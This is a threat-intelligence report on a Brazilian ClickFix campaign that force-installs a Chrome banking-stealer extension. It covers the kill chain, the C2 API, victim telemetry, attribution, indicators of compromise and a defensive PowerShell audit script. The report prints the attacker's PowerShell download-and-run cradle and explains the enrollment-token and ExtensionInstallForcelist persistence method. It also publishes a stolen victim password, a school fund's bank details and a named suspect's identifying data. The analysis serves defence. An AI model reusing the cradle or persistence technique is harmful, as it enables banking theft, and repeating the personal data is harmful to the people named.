
59 Victims, Zero Authentication: A ClickFix Campaign Force-Installs a Chrome Extension Banking Stealer and Leaves the Entire C2 Wide Open


Published: April 10, 2026
Author: GHOST — Breakglass Intelligence
TLP: CLEAR
Tags: ClickFix, Brazilian Banking Trojan, Chrome Extension Abuse, Credential Theft, Pix Fraud, C2 Infrastructure


Executive Summary

A community tip from @HuntYethHounds on X — replying to our earlier Grandoreiro ClickFix report — led GHOST to a fully exposed Brazilian banking fraud operation running on a hijacked subdomain of a legitimate Bangladeshi web developer's domain. The operator left every endpoint of the command-and-control server unauthenticated: the admin panel, live victim screenshots, stolen credentials, intercepted banking requests, and real-time WebSocket control channels were all accessible without a single authentication check.

The operation combines ClickFix social engineering with a force-installed Chrome extension that has zero antivirus detections (0/38) and targets eight Brazilian financial institutions. At the time of investigation, 59 machines were compromised, seven were online, and the C2 contained live screenshots of banking sessions, stolen passwords in cleartext, and intercepted Pix payment data — including what appears to be a school fund account belonging to a real Brazilian educational institution.

The actor behind the phishing infrastructure is identified by name via WHOIS: ANTONIO EDUARDO FREDERICO, registered with a Brazilian CPF and a Gmail address. This is one of six critical OPSEC failures that fully expose the operation.


Table of Contents

  1. Origin of the Tip
  2. Infrastructure Overview
  3. Kill Chain Analysis
  4. The Chrome Extension: BCB v4.0.11
  5. PowerShell Payload
  6. The C2: Complete API Mapping
  7. Victim Telemetry
  8. Phishing Panel: Banco do Brasil Clone
  9. Targeted Financial Institutions
  10. Attribution
  11. OPSEC Failures
  12. Timeline
  13. Detection Status
  14. MITRE ATT&CK Mapping
  15. What This Report Adds to the Public Record
  16. Indicators of Compromise
  17. Recommendations

Origin of the Tip

On April 10, 2026, @HuntYethHounds replied to our earlier report on Grandoreiro campaigns leveraging ClickFix social engineering, flagging test1[.]amanur[.]com as hosting a Portuguese-language ClickFix lure. GHOST pivoted on the domain and within hours had mapped the full infrastructure, extracted the Chrome extension, decoded the PowerShell installer, enumerated all 59 victims, and identified the actor by name.

Credit to @HuntYethHounds for the initial observation that made this investigation possible.


Infrastructure Overview

The operation spans three domains and a single primary VPS, with extension hosting and WebSocket relay on separate Hostinger infrastructure behind Cloudflare.

Primary C2 Server

Attribute | Value
--------- | -----
Domain    | test1[.]amanur[.]com
IP        | 144[.]126[.]140[.]33
Hosting   | Contabo VPS, St. Louis, MO
OS        | Windows Server

Exposed services on 144[.]126[.]140[.]33:

Port   | Service                | Function
------ | ---------------------- | --------
80/443 | Apache 2.4.58 (Win64)  | ClickFix landing pages
3000   | Uvicorn (Python)       | Main C2 API — fully unauthenticated
5000   | Werkzeug (Python)      | Banco do Brasil phishing clone + "Painel BB Control" admin
3306   | MariaDB                | Database — exposed to internet
3389   | RDP                    | Remote Desktop — exposed to internet
5985   | WinRM                  | Windows Remote Management — exposed to internet

Supporting Infrastructure

Domain                         | Purpose                                    | Hosting
------------------------------ | ------------------------------------------ | -------
xpie348[.]online               | Chrome extension hosting and distribution  | Hostinger, behind Cloudflare
certificadosuporte[.]com[.]br  | WebSocket C2 relay for phishing panel      | Hostinger
protocolovirtual[.]org         | Additional ClickFix lure domain            | Same IP: 144[.]126[.]140[.]33

The Hijacked Domain

amanur[.]com is the legitimate personal domain of Amanur Rahman, a Bangladeshi web developer. Only the test1 subdomain resolves to the malicious IP — all other subdomains and the root domain point to legitimate infrastructure. Rahman is assessed with high confidence to be a victim of subdomain hijacking, not a participant in the operation.


Kill Chain Analysis

The infection chain is a textbook ClickFix delivery combined with an unusual persistence mechanism: force-installing a Chrome extension via enterprise policy using Chrome Cloud Management enrollment tokens.

Stage 1: Social Engineering (ClickFix Lure)

The victim lands on test1[.]amanur[.]com or protocolovirtual[.]org and is presented with a fake reCAPTCHA verification page rendered entirely in Portuguese:

  • "Verificando..." (Verifying...)
  • "Nao sou um robo" (I'm not a robot)

The page mimics Google's reCAPTCHA UI. When the victim clicks the fake checkbox, a PowerShell command is silently copied to the clipboard.

Stage 2: User-Assisted Execution

The lure instructs the victim to execute the clipboard contents:

  1. Press Win+R to open the Run dialog
  2. Press Ctrl+V to paste the PowerShell command
  3. Press Ctrl+Shift+Enter to run it as Administrator

This bypasses browser-based download protections entirely. The victim is the execution vector.

Stage 3: Chrome Extension Force-Install

The PowerShell payload (detailed below) enrolls the victim's Chrome browser into a Chrome Cloud Management domain using a hardcoded enrollment token, then sets enterprise policy registry keys to force-install the malicious "BCB" extension. The extension installs silently, without user interaction, and cannot be removed through Chrome's normal extension management.

Stage 4: Banking Session Interception

Once installed, the BCB extension:

  • Intercepts all HTTP/HTTPS traffic to targeted banking domains
  • Captures cookies, session tokens, and passwords in real time
  • Takes screenshots of the victim's screen every few seconds
  • Forwards everything to the C2 via the extension's background service worker

Stage 5: Operator-Controlled Fraud

The operator monitors victims in real time via WebSocket and the C2 admin panel. Capabilities include:

  • Screen locking: Overlay that blocks victim interaction while the operator works
  • Balance manipulation: Injecting fake account balances to hide ongoing theft
  • QR code injection: Replacing legitimate Pix QR codes with attacker-controlled ones
  • Token capture: Stealing 2FA tokens and session cookies in transit
  • Password theft: Intercepting banking login credentials in cleartext

Stage 6: Banco do Brasil Session Hijacking

A dedicated phishing panel on port 5000 clones the Banco do Brasil PJ (business banking) interface. Stolen sessions and credentials are replayed here, with the "Painel BB Control" admin interface giving the operator a dashboard for managing active session hijacks.


The Chrome Extension: BCB v4.0.11

Attribute        | Value
---------------- | -----
Extension ID     | ooidffpmpnebkcjneofkaidbcafefiag
Name             | BCB (Banco Central do Brasil)
Version          | 4.0.11
Manifest         | V3
CRX SHA256       | 401c125517b1f845289bf0a7a33e5db0391034f631eab85dd65b76b7fec9a959
AV Detections    | 0/38
Update URL       | hxxp://xpie348[.]online/instalador/update.xml
Enrollment Token | b5ccdac1-a263-4592-9d25-8bca765403f7

The extension masquerades as a tool from Brazil's Central Bank (Banco Central do Brasil, abbreviated BCB). It uses Manifest V3, which is significant — V3 extensions are supposed to have reduced capabilities compared to V2, yet the operator has implemented a fully functional credential stealer within the V3 constraints.

Key capabilities observed in the extension code:

  • webRequest interception: Hooks into all requests to targeted banking domains, capturing headers (including session cookies and authorization tokens) before they reach the server
  • Screenshot capture: Uses chrome.tabs.captureVisibleTab() on a timer, sending Base64-encoded screenshots to the C2 every few seconds
  • WebSocket communication: Maintains a persistent connection to the C2 for real-time operator control
  • DOM injection: Can inject overlays, fake QR codes, and modified balance displays into live banking pages
  • Clipboard access: Can read and modify clipboard contents (used in Pix code substitution)

The extension communicates with the C2 at 144[.]126[.]140[.]33:3000 over cleartext HTTP — no TLS, no obfuscation, no domain fronting. The C2 IP is hardcoded directly into the extension source.


PowerShell Payload

The decoded PowerShell copied to the victim's clipboard performs the following operations:

# 1. Download the Chrome extension installer script
Invoke-WebRequest -Uri "hxxp://xpie348[.]online/instalador/get_token.ps1" -OutFile "$env:TEMP\get_token.ps1"

# 2. Execute the installer
& "$env:TEMP\get_token.ps1"

The downloaded get_token.ps1 (SHA256: b68eefb10e2c304681532bc0c812c7905888e6b8e47448f1e4bc1edfe7ac193d) performs:

  1. Chrome Cloud Management Enrollment: Writes the enrollment token b5ccdac1-a263-4592-9d25-8bca765403f7 to the Windows registry, enrolling the victim's Chrome into an attacker-controlled management domain. This is an abuse of Chrome's legitimate enterprise management feature — designed for corporate IT to manage browser policies across an organization.

  2. Enterprise Policy Registry Keys: Sets ExtensionInstallForcelist registry keys under HKLM\SOFTWARE\Policies\Google\Chrome\ to force-install the BCB extension from hxxp://xpie348[.]online/instalador/update.xml. Because the extension is installed via enterprise policy, the victim cannot remove it through Chrome's extension manager — the "Remove" button is grayed out, and Chrome displays "Installed by your administrator."

  3. Persistence: The enrollment and force-install policy survive browser restarts and updates. The extension auto-updates from the attacker's server.

This technique is notable because it weaponizes Chrome's enterprise management infrastructure. The victim's browser effectively becomes "managed" by the attacker, as if it were a corporate asset under their IT department's control.


The C2: Complete API Mapping

The C2 running on port 3000 (Uvicorn/Python) is completely unauthenticated. Every endpoint responds to any request without requiring credentials, tokens, or session cookies. The operator even left the OpenAPI specification endpoint enabled.

Documented Endpoints

Endpoint                         | Method | Function
-------------------------------- | ------ | --------
/admin                           | GET    | Admin panel UI — full dashboard
/api/users                       | GET    | List all 59 victims with UUIDs, machine names, install dates
/api/stats                       | GET    | Aggregate statistics — total victims, online count, intercepted requests
/screen/{uid}                    | GET    | Live screenshot of victim's screen (Base64 PNG)
/send/{uuid}/{bank}/lock         | POST   | Lock victim's screen with overlay
/send/{uuid}/{bank}/tokens       | GET    | Retrieve stolen 2FA tokens for victim
/send/{uuid}/{bank}/senha_conta  | GET    | Retrieve stolen account passwords for victim
/send/{uuid}/{bank}/saldo        | POST   | Inject fake balance display
/send/{uuid}/{bank}/qrcode       | POST   | Inject fake Pix QR code
/broadcast/block                 | POST   | Lock ALL victim screens simultaneously
/create-user                     | POST   | Register new victim in C2
/clients                         | GET    | List currently connected WebSocket clients
/openapi.json                    | GET    | Full OpenAPI/Swagger specification of the C2 API

The presence of /openapi.json is remarkable — the operator built the C2 using FastAPI (a Python web framework that auto-generates OpenAPI docs) and left the documentation endpoint enabled in production. This gave GHOST a complete, machine-readable specification of every API endpoint, parameter, and response schema without any reverse engineering.

WebSocket Channels

The C2 also operates real-time WebSocket channels for:

  • Victim heartbeat and status updates
  • Live screenshot streaming
  • Operator command dispatch (lock, inject, capture)
  • Credential and token relay

Victim Telemetry

At the time of investigation, the /api/users endpoint returned data on 59 compromised machines, with 7 actively online.

Aggregate Statistics

Metric                                | Value
------------------------------------- | -----
Total compromised machines            | 59
Online at time of investigation       | 7
First observed infection              | April 7, 2026
Days active at time of investigation  | 3
Average infection rate                | ~20 machines/day

Case Study: Victim 0632a84a

One victim, identified by UUID 0632a84a, demonstrated the full impact of the operation:

  • 8,616 total intercepted HTTP requests captured by the extension
  • 27 filtered banking requests specifically targeting Banco do Brasil endpoints
  • Stolen password visible in cleartext via the /send/{uuid}/bb/senha_conta endpoint: 75863216
  • Live screenshots showed the victim actively using Banco do Brasil's online banking interface

Real Victim Data in Phishing Panel

The Banco do Brasil phishing clone on port 5000 contained hardcoded data from an active session hijack:

Field          | Value
-------------- | -----
Account holder | CAIXA ESCOLAR DOUTOR JUSCELINO K. DE OLIVEIRA
Account type   | School fund (Caixa Escolar)
Account number | 152-X
Branch         | 25416-9
Greeting name  | ROSARIA

"Caixa Escolar" is a type of Brazilian school fund — a financial account managed by public schools for receiving and disbursing educational funds. The operator was actively targeting a school's financial account. The greeting name "ROSARIA" likely corresponds to the school fund administrator or treasurer.


Phishing Panel: Banco do Brasil Clone

Port 5000 runs a Werkzeug (Flask) application serving two functions:

  1. Banco do Brasil PJ Clone: A pixel-perfect replica of Banco do Brasil's business banking (Pessoa Juridica) login and dashboard. This is used to replay stolen sessions — the operator logs in using captured cookies and tokens, then interacts with the real banking backend through the cloned interface.

  2. Painel BB Control: An admin dashboard for managing active session hijacks. This panel shows:

    • Active stolen sessions with account holder names
    • Real-time balance information
    • Transaction history pulled from stolen sessions
    • Controls for initiating Pix transfers using stolen credentials

The separation of the phishing panel (port 5000) from the main C2 (port 3000) suggests modular design — the operator may use different panels for different banks or swap them out as needed.


Targeted Financial Institutions

The BCB extension's webRequest filters and content scripts target eight Brazilian financial institutions:

Institution              | Targeted Domain(s)        | Type
------------------------ | ------------------------- | ----
Caixa Economica Federal  | gerenciador.caixa.gov.br  | Federal savings bank
Banco do Brasil          | *.bb.com.br               | Federal bank
BANPARA                  | *.banpara.b.br            | Para state bank
Banco da Amazonia        | *.bancoamazonia.com.br    | Regional development bank
Sicredi                  | *.sicredi.com.br          | Credit union cooperative
Via Credi                | *.viacredi.coop.br        | Credit cooperative
Global Getnet            | *.getnet.com.br           | Payment processor
Conta Azul               | *.contaazul.com           | Business accounting platform

The targeting is heavily weighted toward Northern Brazilian regional banks (BANPARA, Banco da Amazonia) and cooperative financial institutions (Sicredi, Via Credi), alongside the two largest federal banks. The inclusion of Conta Azul (a business accounting SaaS) and Getnet (a payment processor) suggests the operator is also interested in corporate financial data beyond traditional consumer banking.


Attribution

Named Actor

WHOIS registration for certificadosuporte[.]com[.]br (the WebSocket C2 relay domain) reveals:

Field      | Value
---------- | -----
Registrant | ANTONIO EDUARDO FREDERICO
CPF        | ***.023.548-**
Email      | ventonortemaria@gmail[.]com
Domain     | certificadosuporte[.]com[.]br

The CPF (Cadastro de Pessoas Fisicas) is Brazil's individual taxpayer identification number, confirming the registrant is a Brazilian national.

Supporting Attribution Indicators

  • Language: All ClickFix lure text is in Portuguese. Code comments throughout the C2 and extension are in Portuguese.
  • Targeting: Exclusively Brazilian financial institutions, with emphasis on Northern Brazilian regional banks.
  • Domain TLD: .com.br (Brazilian country-code TLD) used for C2 relay infrastructure.
  • Pix targeting: Pix is Brazil's instant payment system operated by the Central Bank of Brazil, used exclusively within Brazil.
  • Extension name: "BCB" (Banco Central do Brasil) — the abbreviation of Brazil's central bank.

Hijacked Domain Owner

Amanur Rahman, the owner of amanur[.]com, is a Bangladeshi web developer with a legitimate online presence. The root domain and all subdomains except test1 resolve to legitimate infrastructure. Rahman is assessed as a victim of subdomain hijacking — likely through a dangling DNS record or compromised hosting panel — and not a participant in the fraud operation.


OPSEC Failures

The operator made six critical operational security failures that fully exposed the operation:

1. Real Identity in WHOIS

The certificadosuporte[.]com[.]br domain was registered with the operator's real name and CPF. Brazilian .com.br registrations require a valid CPF, but privacy services and intermediaries are available and commonly used by threat actors. The operator did not use one.

2. Completely Unauthenticated C2

Every endpoint on the C2 — including the admin panel, victim list, live screenshots, stolen credentials, and broadcast lock — responds without any authentication. No API keys, no session tokens, no IP allowlisting. The OpenAPI specification is even publicly accessible, providing a machine-readable map of the entire operation.

3. Real Victim Data Hardcoded in Phishing Panel

The Banco do Brasil phishing clone contains hardcoded real victim data (account holder name, account number, branch) visible in the page source. This is not dynamically loaded — it is static HTML, meaning anyone who views the page sees real stolen banking data.

4. Cleartext C2 IP in Extension

The C2 server IP address (144[.]126[.]140[.]33) is hardcoded in cleartext in the Chrome extension source code. No domain fronting, no proxy, no obfuscation. Any analyst who unpacks the CRX can immediately identify the C2.

5. Mixed HTTP/HTTPS

The extension communicates with the C2 over cleartext HTTP, not HTTPS. Screenshots, stolen credentials, and banking tokens transit the network unencrypted. This means the stolen data is not only exposed on the C2 but also to any network observer between the victim and the server.

6. Portuguese Comments in Code

Both the C2 server code and the Chrome extension contain comments written in Portuguese, providing additional confirmation of the operator's nationality and making the code easier to analyze.


Timeline

Date               | Event
------------------ | -----
May 2016           | amanur[.]com registered by Amanur Rahman (legitimate)
2024-2025          | certificadosuporte[.]com[.]br registered by ANTONIO EDUARDO FREDERICO
Early 2026         | xpie348[.]online registered for extension hosting
~March 2026        | protocolovirtual[.]org registered as additional ClickFix lure
~Early April 2026  | test1[.]amanur[.]com subdomain pointed to 144[.]126[.]140[.]33
April 7, 2026      | First victim infection recorded in C2
April 8-9, 2026    | Rapid victim accumulation — 59 machines in 3 days
April 10, 2026     | @HuntYethHounds tips Breakglass Intelligence; GHOST investigation initiated
April 10, 2026     | Full C2 enumeration, extension extraction, victim telemetry dump, attribution

Detection Status

Indicator                      | Platform   | Detections
------------------------------ | ---------- | ----------
amanur[.]com                   | VirusTotal | 0/94
xpie348[.]online               | VirusTotal | 7/94
certificadosuporte[.]com[.]br  | VirusTotal | 1/94
bcb.crx (Chrome extension)     | VirusTotal | 0/38
get_token.ps1                  | VirusTotal | Not submitted at time of investigation

The primary C2 domain and the Chrome extension have zero detections. The extension's 0/38 score is particularly concerning — 59 victims over three days with no AV flagging the malicious extension.


MITRE ATT&CK Mapping

Technique                                        | ID        | Application
------------------------------------------------ | --------- | -----------
User Execution: Malicious Link                   | T1204.001 | ClickFix lure tricks victim into running payload
Command and Scripting Interpreter: PowerShell    | T1059.001 | PowerShell installs Chrome extension via enterprise policy
Browser Extensions                               | T1176     | Malicious "BCB" extension force-installed via Chrome Cloud Management
Browser Session Hijacking                        | T1185     | Real-time interception and replay of banking sessions
Steal Web Session Cookie                         | T1539     | Extension captures session cookies from targeted banking domains
Input Capture: Keylogging                        | T1056.001 | Extension captures passwords and form inputs
Screen Capture                                   | T1113     | Periodic screenshots sent to C2
Application Layer Protocol: Web Protocols        | T1071.001 | HTTP/WebSocket for C2 communication
Encrypted Channel                                | T1573     | HTTPS used for some C2 relay traffic (certificadosuporte[.]com[.]br)
Acquire Infrastructure: Domains                  | T1583.001 | Multiple domains registered for lures, hosting, relay
Acquire Infrastructure: Virtual Private Server   | T1583.003 | Contabo VPS as primary C2
Defacement: Internal Defacement                  | T1491.001 | Overlay injection to lock victim screens and manipulate displayed content

What This Report Adds to the Public Record

This investigation contributes the following to the collective understanding of ClickFix-based banking fraud operations:

  • Complete kill chain documentation from ClickFix lure to Pix payment fraud, including the novel use of Chrome Cloud Management enrollment tokens to force-install malicious extensions via enterprise policy
  • Full C2 API specification extracted from the operator's own OpenAPI endpoint, providing defenders with a complete map of the command-and-control protocol
  • Chrome extension analysis of a Manifest V3 banking stealer with 0/38 AV detections, demonstrating that MV3's security improvements do not prevent sophisticated credential theft
  • Named actor attribution via WHOIS, linking the operation to a specific individual
  • Victim telemetry showing the real-world impact on Brazilian financial institutions and a school fund account
  • Infrastructure mapping across three domains and multiple hosting providers, with full port/service enumeration

We maintain a standing offer to credit prior work. If any researcher or organization has previously documented this infrastructure or actor, we will update this report with appropriate attribution.


Indicators of Compromise

Domains

test1[.]amanur[.]com
xpie348[.]online
certificadosuporte[.]com[.]br
protocolovirtual[.]org

IP Addresses

144[.]126[.]140[.]33 (Contabo, St. Louis MO — primary C2)

Hashes (SHA256)

401c125517b1f845289bf0a7a33e5db0391034f631eab85dd65b76b7fec9a959 (bcb.crx — Chrome extension)
b68eefb10e2c304681532bc0c812c7905888e6b8e47448f1e4bc1edfe7ac193d (get_token.ps1 — PowerShell installer)

Chrome Extension

Extension ID: ooidffpmpnebkcjneofkaidbcafefiag
Name: BCB (Banco Central do Brasil)
Version: 4.0.11
Manifest: V3
Chrome Cloud Management Enrollment Token: b5ccdac1-a263-4592-9d25-8bca765403f7
Update URL: hxxp://xpie348[.]online/instalador/update.xml

URLs

hxxp://test1[.]amanur[.]com (ClickFix lure)
hxxp://protocolovirtual[.]org (ClickFix lure)
hxxp://xpie348[.]online/instalador/update.xml (extension update manifest)
hxxp://xpie348[.]online/instalador/get_token.ps1 (PowerShell installer)
hxxp://144[.]126[.]140[.]33:3000/admin (C2 admin panel)
hxxp://144[.]126[.]140[.]33:3000/api/users (victim enumeration)
hxxp://144[.]126[.]140[.]33:3000/openapi.json (API specification)
hxxp://144[.]126[.]140[.]33:5000 (Banco do Brasil phishing clone)
wss://certificadosuporte[.]com[.]br (WebSocket C2 relay)

Email Addresses

ventonortemaria@gmail[.]com (domain registrant)

WHOIS Attribution

Registrant: ANTONIO EDUARDO FREDERICO
CPF: ***.023.548-**
Domain: certificadosuporte[.]com[.]br

Recommendations

For defenders at targeted financial institutions:

  • Block the IOCs listed above at network perimeter and endpoint
  • Monitor for Chrome enterprise policy modifications via PowerShell, specifically ExtensionInstallForcelist registry writes under HKLM\SOFTWARE\Policies\Google\Chrome\
  • Alert on Chrome Cloud Management enrollment from non-corporate endpoints
  • Review Chrome extension installs for ID ooidffpmpnebkcjneofkaidbcafefiag
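The following host-audit script is an added example (not part of this report and not the operator's code) that turns the persistence mechanism described in the PowerShell Payload section and the defender recommendations above into a single check. It assumes a Windows endpoint with PowerShell 5.1 or later run elevated; the ExtensionInstallForcelist path and the CloudManagementEnrollmentToken policy name are Chrome's own, the CloudManagement\EnrollmentToken location and the RunMRU heuristics are assumptions for this example.

```powershell
# Added host-audit example (not the report's or the operator's code). Assumes Windows,
# PowerShell 5.1+, elevated for HKLM reads. Findings are returned as objects so the
# output can be piped to Export-Csv or a SIEM forwarder.
# Indicators taken from the report:
$BadExtensionId = 'ooidffpmpnebkcjneofkaidbcafefiag'
$BadToken       = 'b5ccdac1-a263-4592-9d25-8bca765403f7'
$BadHosts       = @('xpie348.online', 'test1.amanur.com', 'protocolovirtual.org', '144.126.140.33')

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Check, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Host = $env:COMPUTERNAME; Check = $Check; Detail = $Detail })
}

# 1. ExtensionInstallForcelist: each value is "<extension-id>;<update-url>". The report's
#    extension ID is a known-bad hit; any entry whose update URL is not the Chrome Web
#    Store is worth a look, because policy-installed extensions cannot be removed by the user.
$forceKeys = @(
    'HKLM:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist',
    'HKCU:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist'
)
foreach ($key in $forceKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }           # skip the registry provider's metadata
        $extId, $updateUrl = "$($p.Value)" -split ';', 2
        if ($extId -eq $BadExtensionId) {
            Add-Finding 'ForcelistKnownBad' "$key\$($p.Name) = $($p.Value)"
        } elseif ($updateUrl -and $updateUrl -notmatch '^https://clients2\.google\.com/') {
            Add-Finding 'ForcelistNonStoreUpdateUrl' "$key\$($p.Name) = $($p.Value)"
        }
    }
}

# 2. Chrome Cloud Management enrollment. CloudManagementEnrollmentToken is the Chrome
#    policy name; the CloudManagement\EnrollmentToken location is assumed here as the
#    alternative machine-level key. Any token on a host your IT department did not
#    enroll is a finding; the report's token is a known-bad hit.
$tokenLocations = @(
    @{ Path = 'HKLM:\SOFTWARE\Policies\Google\Chrome';          Name = 'CloudManagementEnrollmentToken' },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Google\CloudManagement'; Name = 'EnrollmentToken' }
)
foreach ($loc in $tokenLocations) {
    $val = (Get-ItemProperty -Path $loc.Path -Name $loc.Name -ErrorAction SilentlyContinue).($loc.Name)
    if (-not $val) { continue }
    $check = if ($val -eq $BadToken) { 'EnrollmentTokenKnownBad' } else { 'EnrollmentTokenPresent' }
    Add-Finding $check "$($loc.Path)\$($loc.Name) = $val"
}

# 3. ClickFix residue: the Win+R dialog records what the user pasted in Explorer's RunMRU.
#    A PowerShell download cradle, or any of the report's hosts, in that history is a
#    strong signal that the lure was followed (heuristic, assumed for this example).
$runMru = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -ErrorAction SilentlyContinue
if ($runMru) {
    foreach ($p in $runMru.PSObject.Properties) {
        if ($p.Name -like 'PS*' -or $p.Name -eq 'MRUList') { continue }
        $cmd = "$($p.Value)"
        $hitHost = $BadHosts | Where-Object { $cmd -match [regex]::Escape($_) } | Select-Object -First 1
        if ($hitHost) {
            Add-Finding 'RunMruKnownBadHost' $cmd
        } elseif ($cmd -match '(?i)powershell.*(Invoke-WebRequest|iwr|DownloadString|-enc)') {
            Add-Finding 'RunMruPowerShellCradle' $cmd
        }
    }
}

if ($findings.Count -eq 0) { Write-Host "No ClickFix / forced-extension indicators found on $env:COMPUTERNAME" }
$findings
```

Run it per host from your endpoint management tool and forward the objects it emits; a ForcelistKnownBad or EnrollmentTokenKnownBad finding is an infected machine, while the Present and NonStoreUpdateUrl checks need comparison against your own Chrome policy baseline.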

For Chrome/Google:

  • The Chrome Cloud Management enrollment token b5ccdac1-a263-4592-9d25-8bca765403f7 should be revoked
  • The extension ID ooidffpmpnebkcjneofkaidbcafefiag should be blocked

For hosting providers:

  • Contabo: 144[.]126[.]140[.]33 is hosting an active fraud operation with exposed RDP, WinRM, and MariaDB
  • Hostinger: xpie348[.]online and certificadosuporte[.]com[.]br are serving malware and C2 relay respectively

For Amanur Rahman (domain owner):

  • Audit DNS records for amanur[.]com and remove the test1 subdomain pointing to 144[.]126[.]140[.]33
  • Review hosting panel access logs for unauthorized modifications

This investigation was triggered by a community tip. Threat intelligence works best as a collective effort. If you observe related infrastructure or have additional context on this actor, reach out via reply or DM on X.

GHOST — Breakglass Intelligence April 10, 2026
